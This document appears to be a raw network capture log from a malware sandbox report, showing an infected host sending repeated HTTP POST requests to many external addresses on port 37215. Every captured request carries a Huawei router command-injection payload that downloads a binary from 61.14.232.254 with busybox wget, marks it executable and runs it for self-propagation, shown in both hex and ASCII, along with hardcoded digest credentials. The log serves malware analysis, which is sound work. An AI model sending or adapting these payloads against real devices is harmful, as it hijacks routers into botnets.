6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  980192.168.2.1360030157.117.197.9137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.454180002 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  981192.168.2.1355000157.144.85.937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.454241991 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  982192.168.2.1342734120.20.240.2437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.455018044 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  983192.168.2.134689241.245.123.15937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.455039024 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  984192.168.2.1358970197.78.149.9137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.455061913 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  985192.168.2.1360582157.162.160.18837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.455122948 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  986192.168.2.135267441.252.201.20537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.455138922 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  987192.168.2.1347126101.8.215.23237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.455156088 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  988192.168.2.135553281.61.80.9537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.455182076 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  989192.168.2.134175495.7.17.21137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.457663059 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  990192.168.2.1335534157.228.237.8137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.457861900 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
